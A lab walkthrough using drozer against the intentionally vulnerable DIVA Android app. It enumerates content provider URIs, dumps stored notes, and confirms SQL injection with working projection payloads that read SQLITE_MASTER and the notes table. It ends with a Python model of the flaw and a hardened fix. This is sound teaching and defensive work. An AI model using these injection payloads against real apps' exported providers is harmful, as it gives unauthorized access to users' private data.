References:
Genymotion:
DIVA:
Drozer:
Download Link:
Document:
1. Connect to the drozer server
Start the drozer server on the Genymotion Android device.
On the client PC, forward the drozer port with the command “adb forward tcp:31415 tcp:31415”.
Open a drozer console with “drozer console connect”.
    Selecting 168b152501f68e9c (Genymotion Samsung Galaxy S9 8.0.0)

                ..                    ..:.
               ..o..                  .r..
                ..a..  . ....... .  ..nd
                  ro..idsnemesisand..pr
                  .otectorandroidsneme.
               .,sisandprotectorandroids+.
             ..nemesisandprotectorandroidsn:.
            .emesisandprotectorandroidsnemes..
          ..isandp,..,rotectorandro,..,idsnem.
          .isisandp..rotectorandroid..snemisis.
          ,andprotectorandroidsnemisisandprotec.
         .torandroidsnemesisandprotectorandroid.
         .snemisisandprotectorandroidsnemesisan:
         .dprotectorandroidsnemesisandprotector.

    drozer Console (v2.4.3)
    dz> help
    drozer: Android Security Assessment Framework

    Type `help COMMAND` for more information on a particular command, or `help
    MODULE` for a particular module.

    Commands:

    cd     contributors  env   help  load    permissions  set    unset
    clean  echo          exit  list  module  run          shell

    Miscellaneous help topics:

    intents
2. Scan content URI paths
    dz> run app.package.list -f diva
    jakhar.aseem.diva (Diva)
    dz> run app.provider.
    app.provider.columns  app.provider.download  app.provider.info    app.provider.query  app.provider.update
    app.provider.delete   app.provider.finduri   app.provider.insert  app.provider.read
    dz> run app.provider.finduri jakhar.aseem.diva
    Scanning jakhar.aseem.diva...
    content://jakhar.aseem.diva.provider.notesprovider/notes/
    content://jakhar.aseem.diva.provider.notesprovider
    content://jakhar.aseem.diva.provider.notesprovider/
    content://jakhar.aseem.diva.provider.notesprovider/notes
3. Query the content provider’s data
    dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes
    | _id | title | note |
    | 5 | Exercise | Alternate days running |
    | 4 | Expense | Spent too much on home theater |
    | 6 | Weekend | b333333333333r |
    | 3 | holiday | Either Goa or Amsterdam |
    | 2 | home | Buy toys for baby, Order dinner |
    | 1 | office | 10 Meetings. 5 Calls. Lunch with CEO |
4. Scan for SQL injection points
The scanner tests two query parameters for injection: the projection and the selection.
    dz> run scanner.provider.injection -a jakhar.aseem.diva
    Scanning jakhar.aseem.diva...
    Not Vulnerable:
      content://jakhar.aseem.diva.provider.notesprovider
      content://jakhar.aseem.diva.provider.notesprovider/

    Injection in Projection:
      content://jakhar.aseem.diva.provider.notesprovider/notes/
      content://jakhar.aseem.diva.provider.notesprovider/notes

    Injection in Selection:
      content://jakhar.aseem.diva.provider.notesprovider/notes/
      content://jakhar.aseem.diva.provider.notesprovider/notes
5. Validate the SQL injection points
    dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --selection "'"
    unrecognized token: "') ORDER BY title" (code 1): , while compiling: SELECT * FROM notes WHERE (') ORDER BY title
    dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "'"
    unrecognized token: "' FROM notes ORDER BY title" (code 1): , while compiling: SELECT ' FROM notes ORDER BY title
    dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM SQLITE_MASTER WHERE type='table';--"
    | type | name | tbl_name | rootpage | sql |
    | table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
    | table | notes | notes | 4 | CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, note TEXT NOT NULL) |
    | table | sqlite_sequence | sqlite_sequence | 5 | CREATE TABLE sqlite_sequence(name,seq) |
    dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM notes;--"
    | _id | title | note |
    | 1 | office | 10 Meetings. 5 Calls. Lunch with CEO |
    | 2 | home | Buy toys for baby, Order dinner |
    | 3 | holiday | Either Goa or Amsterdam |
    | 4 | Expense | Spent too much on home theater |
    | 5 | Exercise | Alternate days running |
    | 6 | Weekend | b333333333333r |
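Why steps 4 and 5 succeed, and what the fix looks like, modelled in Python with sqlite3. This is an added example, not DIVA's code or part of the original walkthrough. The concatenation in build_sql is inferred from the error messages in step 5, and the function names, the filters argument and the sample rows are assumptions.

```python
import sqlite3

ALLOWED_COLUMNS = ("_id", "title", "note")  # the notes columns shown in step 3

def make_db():
    """In-memory stand-in for the app database (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, "
               "title TEXT NOT NULL, note TEXT NOT NULL)")
    db.executemany("INSERT INTO notes (title, note) VALUES (?, ?)",
                   [("office", "10 Meetings. 5 Calls. Lunch with CEO"),
                    ("home", "Buy toys for baby, Order dinner")])
    return db

def build_sql(projection=None, selection=None):
    """Concatenate caller text into the statement (assumed from the step 5 errors)."""
    cols = ", ".join(projection) if projection else "*"
    where = f" WHERE ({selection})" if selection else ""
    return f"SELECT {cols} FROM notes{where} ORDER BY title"

def query_vulnerable(db, projection=None, selection=None):
    """Run the concatenated statement as-is: caller text becomes SQL."""
    return db.execute(build_sql(projection, selection)).fetchall()

def query_hardened(db, projection=None, filters=None):
    """Allowlist column names; pass filter values only as bound parameters."""
    cols = list(projection) if projection else list(ALLOWED_COLUMNS)
    filters = dict(filters or {})
    for name in cols + list(filters):
        if name not in ALLOWED_COLUMNS:
            raise ValueError(f"column not allowed: {name!r}")
    sql = f"SELECT {', '.join(cols)} FROM notes"
    if filters:
        sql += " WHERE " + " AND ".join(f"{c} = ?" for c in filters)
    return db.execute(sql + " ORDER BY title", list(filters.values())).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = ["* FROM SQLITE_MASTER WHERE type='table';--"]  # string from step 5
    print(build_sql(projection=probe))           # statement the database receives
    print(query_vulnerable(db, projection=probe))
    try:
        query_hardened(db, projection=probe)
    except ValueError as exc:
        print("rejected:", exc)
    print(query_hardened(db, ["title"], {"title": "home"}))
```

On Android the same two controls correspond to restricting the projection to known columns and passing values through selectionArgs, together with not exporting the provider or protecting it with a permission.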